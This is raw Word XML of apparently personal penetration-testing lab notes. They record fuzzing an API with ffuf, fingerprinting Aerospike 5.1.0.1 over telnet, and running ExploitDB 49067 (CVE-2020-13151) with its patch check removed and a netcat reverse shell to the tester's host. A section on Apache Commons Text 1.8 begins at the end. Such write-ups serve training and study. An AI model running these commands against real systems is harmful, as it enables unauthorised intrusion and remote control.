      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u</w:t>
      </w:r>
      <w:hyperlink r:id="rId1227">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1228">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.183.143:80/api/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fc 403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>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089400" cy="2692400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="266" name="image258.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image258.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1229"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="40894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38A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See aerospike is running. However, there is no version number here. HOWEVER, if you look at searchsploit, there is only one aerospike exploit so we were assumed to have try it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The other way to find out about aerospike (including version) was to enumerate the suspicious ports 3000 and 3003 that were open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For port 3003, you can use telnet to connect, and then try random commands like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to find out more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="216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787900" cy="2222500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70" name="image75.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image75.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1230"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47879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38A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, I ran "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but it did nothing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I ran "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" which showed all the commands I can use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">menu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" would be another good one to try</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I ran version, which showed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aerospike 5.1.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AA">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Ok now that we know to try Aerospike exploit, I just used the one I found from searchsploit which was ExploitDB 49067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can look at it here</w:t>
      </w:r>
      <w:hyperlink r:id="rId1231">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1232">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49067</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AC">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I downloaded it as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="95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searchsploit -m 49067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AE">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When I first ran it, to try and get the usage information, I got this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="95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546600" cy="1282700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="92" name="image91.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image91.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1233"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4546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38B0">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I then tried this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install aerospike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B2">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But this gives me the classic pip error. But I searched it up, and you can add the  --break-system-packages to get it to work. I added this to my notes since I've always had to use pipx instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="957"/>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pip3 install aerospike --break-system-packages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This finally worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B5">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And then I ran this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="95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 49067.py --ahost=192.168.183.143 --aport=3000 --netcatshell --lhost=192.168.45.232 --lport=4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, then I got an error saying that "this instance is patched."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B8">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But, we already know that our version is not patched, so I went inside the python code and disabled the check. I found the "exit" code, and just replaced it with "return" so that it wouldn't exit the code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="95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4470400" cy="2044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="160" name="image165.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image165.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1234"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="44704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38BA">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And then I got another error, saying that poc.lua was missing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>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2616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="223" name="image253.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image253.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123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38BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then I searched up poc.lua, found a github repo that mentioned the same CVE, and it had a file called poc.lua, so I made sure to download it in the same directory as my exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1236">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/b4ny4n/CVE-2020-13151</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BE">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And then I ran the code, and it seemed to work, but my shell was not coming back!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BF">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So then, I tried a different port instead of 4444. I tried 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C0">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And it worked!!! Finally!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I saw on discord some people had to increase the time-out length in the exploit. And also, some people had to revert machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yrahpdmi6cim" w:id="530"/>
      <w:bookmarkEnd w:id="530"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Commons Text 1.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX-B .150 and got us foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C8">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Checked out the website on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C9">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I saw a /search directory, I found through guessing that you had to use the "query" parameter in order to query stuff. I guess the "query" parameter since default output was: {"query":"","result":""}</w:t>
      </w:r>
    </w:p>
